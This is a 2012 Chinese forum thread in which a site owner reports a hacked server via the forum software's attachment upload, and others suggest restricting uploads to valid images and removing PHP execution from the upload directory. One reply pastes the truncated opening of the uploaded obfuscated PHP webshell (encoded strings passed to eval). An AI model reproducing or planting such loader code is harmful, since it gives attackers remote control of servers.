大家用这个程序别开放上传 昨天我的服务器被黑了!

By momofa at 2012-12-05 09:25:00 • 1245次点击

设置限制附件类型了吗?

palese at 2012-12-05 09:30:48
1

.bad-jpg

后缀能利用么? - -!

crll at 2012-12-05 09:30:58
2

FTP批量扫描

在服务器在自用电脑上面用 应该都是一个效果吧。

crll at 2012-12-05 09:32:26
3

这个问题设计之初不存在,

参见 http://youbbs.sinaapp.com/t-74http://youbbs.sinaapp.com/t-92

个人建议只开放图片上传,修改一下upload.php 就可以。

admin at 2012-12-05 09:42:25
4

.bad-jpg 是用户上传一个后缀名为jpg而不是一个“合格”的jpg文件,因而会被重命名,为bad-jpg,顾名思义。管理员以后看见这个最好直接删掉该附件,(看来以后可能要添加删附件的功能)

ego008 at 2012-12-05 09:59:38
5

@admin

@ego008 那个文件里的内容是这样的

<?php // MYSQL
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=93780;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJ 此处省略上万字符。

momofa at 2012-12-05 10:09:34
6

@momofa 用第三方存储也是个不错的选择。

修改 https://github.com/ego008/youbbs/blob/master/upload.php#L177 不是正确图片的不保存。

ego008 at 2012-12-05 10:15:48
7

@admin 链接失效了。。

lllllll at 2013-03-17 22:45:58
8

你把上传目录的Php执行权限去掉就可以了

root at 2013-03-21 20:51:01
10
登录 后发表评论